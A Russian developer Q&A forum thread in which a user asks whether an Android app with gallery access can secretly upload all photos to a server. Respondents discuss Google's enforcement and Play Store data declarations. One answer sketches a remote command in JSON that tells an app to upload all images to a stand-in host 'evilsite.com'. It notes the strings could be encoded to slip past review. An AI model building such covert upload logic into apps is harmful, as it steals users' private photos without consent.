Задать вопрос
petushok55
@petushok55
Обучаюсь на практике.
android

Может ли приложение, получив доступ к галерее, взять и отправить втихую все фотки себе на сервер?

что думаете по этому поводу?
если это технически возможно, то отследить можно только с помощью сниффера думаю, но думаю крупные компании таким не промышляют, потому что хоть один случай выявится, то репутации больно будет, а вот мелкие, или другие, которым пофиг
  • Вопрос задан
  • 742 просмотра
1 комментарий
Подписаться 2 Простой 1 комментарий
Пригласить эксперта
Ответы на вопрос 3
@pfg21
ex-турист
да. может. если есть дырка доступ значит есть доступ.
но гугл такие приложения активно отслеживает и банит.
Ответ написан
Комментировать
Комментировать
402d
@402d
начинал с бейсика на УКНЦ в 1988
Отправка фоток на сервер в фоне обычное поведение для любых сетевых дисков.
В этом нет ничего криминального. Остаётся разобраться с термином в тихую.
Фонарику такое нелогично. Явно троян.
Не давно ввели анкету о персональных данных. Фото туда попадают. Надо декларировать.

На сколько там жёстко именно с фото не в курсе.

Сам словил такое. Заявил что не собираю.
Летит отклонение на очередное обновление. Слышь там у тебя есть ввод телефона. Меняй анкету или убирай.

Мля . Модерации писать бесполезно. Никого не волнует, что это ввод для формирования куар кода. Через месяц обнули раздел . А обновы на Бет или частичное внедрение не проходят. Только фулл ролаут допустим. Блин у меня из-за такого развертывания 50 тысяч ошибку словили. Две недели срочные фиксы выпускал

Так я тому, что если в разделе написал, что фото передаешь на сервер, то можно хоть это будет не очевидно в самом приложении.
Ответ написан
Комментировать
Комментировать
firedragon
@firedragon
Не джун-мидл-сеньор, а трус-балбес-бывалый.
Хм предположим гипотетически что у приложения есть разрешения на галерею и интернет доступ.
Пусть оно обращается к серверу и получает json.
Пусть json выглядит примерно так:
"cmd": "uploadallimages",
"url": "https://evilsite.com/upload.php"


Никакая проверка не выявит ничего подозрительного, тем более что строки можно заменить цифрами.
Никакой сниффер кстати не поможет, будет только факт трафика по какому то адресу.
Ответ написан
Комментировать
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы
Вакансии с Хабр Карьеры
Android developer
IRLIX
от 180 000 ₽
Android разработчик
SENSE
До 450 000 ₽
Android developer (Корпоративный поиск)
Сбер Москва
от 230 000 ₽
Ещё вакансии
Заказы с Хабр Фриланса
Ручное тестирование приложения в сторах (iOS и Android)
05 нояб. 2024, в 23:19
3000 руб./за проект
Разработать одностраничный сайт , на сайте будет описание проекта
05 нояб. 2024, в 22:00
5000 руб./за проект
Подправить функционал веб-проекта на laravel (backend)
05 нояб. 2024, в 21:43
4500 руб./за проект
Ещё заказы